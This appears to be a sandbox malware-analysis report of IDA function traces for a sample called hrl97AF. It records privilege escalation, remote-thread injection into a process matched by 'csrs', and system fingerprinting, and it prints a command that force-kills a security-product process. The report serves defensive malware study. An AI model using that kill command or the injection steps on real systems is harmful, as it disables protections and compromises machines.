Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: MessageSend$#4710#6197AddressDirectoryExecExitLibraryLoadLongProcProcessSystemWindowstrncmp
String ID: 100200$100200$100200$taskkill /f /im ZhuDongFangYu.exe /t$|7@
API String ID: 3614577793-2301931671
Opcode ID: e673e02340e5bd4efe8e554bec7010853af1fda679b9e67aa24c048e2f3451a8
Instruction ID: 36d68f4db7c25d412b264195875051be24fd626328578f2d4964cd317598fecc
Opcode Fuzzy Hash: e673e02340e5bd4efe8e554bec7010853af1fda679b9e67aa24c048e2f3451a8
Instruction Fuzzy Hash: 6E11B4307407107BD730AB659E0AF5B77A8BB44B04F10462EFA85B72C1CFF8A8048A5C

Function 009B07B5 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62
processthreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009B13C1: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 009B13D1
Part of subcall function 009B13C1: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 009B13E1

CloseHandle.KERNELBASE(?), ref: 009B05BC
FreeLibrary.KERNELBASE(76DA0000,?,009B07A4,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 009B07C1
CloseHandle.KERNELBASE(?,?,009B07A4,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 009B07C8
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 009B07D2
Process32First.KERNEL32 ref: 009B07E5
Process32Next.KERNEL32 ref: 009B07F6
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 009B080E
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 009B084B
CloseHandle.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 009B0866
CloseHandle.KERNEL32 ref: 009B0875

Strings

csrs, xrefs: 009B0835

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction ID: 0dbbd65e151dee08bd4ce7a0b5921048cae0814ab8677a7717b497bfa926959d
Opcode Fuzzy Hash: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction Fuzzy Hash: 29114231244215FBEB255F21CD8DBFF7A6DEF84762F101028F94699081DBB1CF428AA6

Function 004010B0 Relevance: 4.7, APIs: 3, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#1134.MFC42(00000000), ref: 004010D0

Part of subcall function 004011F0: #324.MFC42(00000066,00000000,?,?,00000000,00405C38,000000FF,004010ED,00000000), ref: 00401214
Part of subcall function 004011F0: #1168.MFC42(00000066,00000000,?,?,00000000), ref: 00401227
Part of subcall function 004011F0: #1146.MFC42(00000080,0000000E,00000080,00000066,00000000,?,?,00000000), ref: 00401238
Part of subcall function 004011F0: LoadIconA.USER32(00000000,00000080), ref: 0040123E

#2514.MFC42(00000000), ref: 004010FD
#641.MFC42(00000000), ref: 004011AA

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: #1134#1146#1168#2514#324#641IconLoad
String ID:
API String ID: 684539369-0
Opcode ID: d0dbdc0e91b82d1144f430ae13d057aa2d360b1f2b28aa11f9f2600f3695659b
Instruction ID: e887a676387cd3a6316cff733c1d11cddbc99e07af3dfecb023e529bfa9dd79e
Opcode Fuzzy Hash: d0dbdc0e91b82d1144f430ae13d057aa2d360b1f2b28aa11f9f2600f3695659b
Instruction Fuzzy Hash: 07F09671854618EBC724EFA4CC42B9DB778FB05724F10033EE815A36C1EB785605CB85

Function 009B111A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(009B110D,009B079F,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 009B111A

Part of subcall function 009B1141: GetProcAddress.KERNEL32(00000000,009B112B), ref: 009B1142

Strings

\rnxtVt, xrefs: 009B1171

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: \rnxtVt
API String ID: 2574300362-1594572371
Opcode ID: 26fcc5e8879559b3b83a82e0dda8a5f548424430b07c6330c5c9e08bd0f2914d
Instruction ID: 3067b662685fc21095eb646c4592805f8dbffd5f059cbf0deb5e2a181e68ac2c
Opcode Fuzzy Hash: 26fcc5e8879559b3b83a82e0dda8a5f548424430b07c6330c5c9e08bd0f2914d
Instruction Fuzzy Hash: C211EC9586C3C25FCB16CB744ABE5D4BF407E0322078CC6CFC5860F2A3E79581028742

Function 00482DD6 Relevance: 1.6, APIs: 1, Instructions: 59
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadAffinityMask.KERNEL32(?,F2222C20,000000FE,C5DF86ED,A22ABE94,00482C74), ref: 00482E70

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: AffinityMaskThread
String ID:
API String ID: 3640065098-0
Opcode ID: c3cf256ebe4f1c2ecfd723cee460dd2a3f2d6b55d1eced337396679191a8835d
Instruction ID: 4312523c05c8ac190cfc8e271565302d471b299cd7a62bb55059f68913cba86f
Opcode Fuzzy Hash: c3cf256ebe4f1c2ecfd723cee460dd2a3f2d6b55d1eced337396679191a8835d
Instruction Fuzzy Hash: 7701AB3A508110DFCB107E3CCE485BD77E2AFD5314F115B1EE1945B284CF385A0A8786

Function 00405B10 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

#1576.MFC42(004035C3,004035C3,004035C3,004035C3,004035C3,00000000,?,0000000A), ref: 00405B20

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: #1576
String ID:
API String ID: 1976119259-0
Opcode ID: 47d5a98b55b57ba85a66e84109f2227387a3d22cae08d4c422bb556fe884a3cf
Instruction ID: d2ca0a3b883f0518e56937479b7600124a2c67ba881e6fa747779e696d41ac8e
Opcode Fuzzy Hash: 47d5a98b55b57ba85a66e84109f2227387a3d22cae08d4c422bb556fe884a3cf
Instruction Fuzzy Hash: 36B0087601C786ABDB02DE91880192BBAA2BB98704F485C1DB2A1140A187768478EB16

Function 009B05C9 Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,009B0865,?,00000000,00000000,-00002FC3,00000002,00000000,?,00000000), ref: 009B05D0

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9edc5c94d801cdde56f49ff5336f37be4f198dfa9831bd9a4b8610ef498a08ec
Instruction ID: 98924bfd55e486d10f53bb03bc4250a4ac19d964606a7a1db1e7ad3cbc5130b7
Opcode Fuzzy Hash: 9edc5c94d801cdde56f49ff5336f37be4f198dfa9831bd9a4b8610ef498a08ec
Instruction Fuzzy Hash: 2BB0122578020096D6340911490DFD615105F80B22FF00066F2071CCC00DE40702290D

Non-executed Functions

Function 00402F70 Relevance: 66.7, APIs: 14, Strings: 24, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000002,?,00000040,?,76F8F550,76F90BD0,00000072), ref: 00402F8B
GetComputerNameA.KERNEL32 ref: 00402FA2
lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Windows NT\CurrentVersion), ref: 00402FBB
strstr.MSVCRT ref: 00403024
strstr.MSVCRT ref: 00403052
strstr.MSVCRT ref: 00403075
lstrcpyA.KERNEL32(?,Windows NT), ref: 00403114
lstrcpyA.KERNEL32(?,HARDWARE\DESCRIPTION\System\CentralProcessor\0), ref: 0040313D
GlobalMemoryStatusEx.KERNEL32(?), ref: 004031C5
lstrcpyA.KERNEL32(?,20108L), ref: 00403201
GetTickCount.KERNEL32 ref: 0040320C

Strings

Windows XP, xrefs: 00403061
<6@, xrefs: 004031A0
Windows 2003, xrefs: 00403084
Windows 2008, xrefs: 004030DA
Windows Vista, xrefs: 004030AF
@, xrefs: 004031BC
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00403136
Windows 7, xrefs: 00403100
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00402FB5
@, xrefs: 00402F9A
~MHz, xrefs: 00403175
ProductName, xrefs: 00402FF5
2008, xrefs: 004030C1
20108L, xrefs: 004031FB
%u MHz, xrefs: 004031AD
F7@, xrefs: 00402FD7, 00403157
Vista, xrefs: 0040309A
Windows NT, xrefs: 00403108
47@, xrefs: 00403003, 0040318B
"7@, xrefs: 0040300E, 00403196
%u MB, xrefs: 004031EA
2000, xrefs: 0040301E
2003, xrefs: 0040306F
Windows 2000, xrefs: 00403033

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: lstrcpy$strstr$ComputerCountGlobalInfoLocaleMemoryNameStatusTick
String ID: "7@$%u MB$%u MHz$2000$2003$2008$20108L$47@$<6@$@$@$F7@$HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Vista$Windows 2000$Windows 2003$Windows 2008$Windows 7$Windows NT$Windows Vista$Windows XP$~MHz
API String ID: 13981014-3306235746
Opcode ID: a7db7102705653c934fd47b61ca4cdcb3c0d92441ed082312b1d186f1afde4d2
Instruction ID: 8024c398b29a2f099fa7e41a4c2d81eb78002d16970cbed0a3e220c746c77202
Opcode Fuzzy Hash: a7db7102705653c934fd47b61ca4cdcb3c0d92441ed082312b1d186f1afde4d2
Instruction Fuzzy Hash: A7614170144305BFD710DF60DD45FAB7BA8AB88745F10493EF585B22D0EA78AA09CF6A

Function 7FE30442 Relevance: 35.3, APIs: 16, Strings: 4, Instructions: 281memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 7FE304CD
GetVersion.KERNEL32 ref: 7FE3050F
VirtualAlloc.KERNEL32(00000000,000065A4,08001000,00000040), ref: 7FE30537
CloseHandle.KERNEL32(?), ref: 7FE305BC

Strings

csrs, xrefs: 7FE30835
"'3, xrefs: 7FE30603
\BaseNamedObjects\rnxtVt, xrefs: 7FE30717
\BaseNamedObjects\rnxtVt, xrefs: 7FE30718, 7FE30735, 7FE30743

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: Handle$AllocCloseModuleVersionVirtual
String ID: "'3$\BaseNamedObjects\rnxtVt$\BaseNamedObjects\rnxtVt$csrs
API String ID: 3017432202-1649617
Opcode ID: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction ID: bf6e148d40060bb9ff3a14a9286da860fd85a46fac5c7d6c15dd231958de371b
Opcode Fuzzy Hash: 7ac06902b526b320f932b07ff4c1ff8a544c7f655dd6fa859a553a943bad6a44
Instruction Fuzzy Hash: 95B16C31A05359FFEB619F20C809BED3BADEF4571AF900024EA0A9E181C7F1AB45CB55

Function 7FE30601 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 184stringnativeprocessCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 7FE305BC
GetModuleHandleA.KERNEL32(7FE305FB), ref: 7FE30601
lstrcpyW.KERNEL32(\BaseNamedObjects\rnxtVt,\BaseNamedObjects\rnxtVt,?,?,?,?), ref: 7FE30719
lstrcpyW.KERNEL32(\BaseNamedObjects\rnxtVt,?), ref: 7FE30736
lstrcatW.KERNEL32(\BaseNamedObjects\rnxtVt,\rnxtVt), ref: 7FE30744
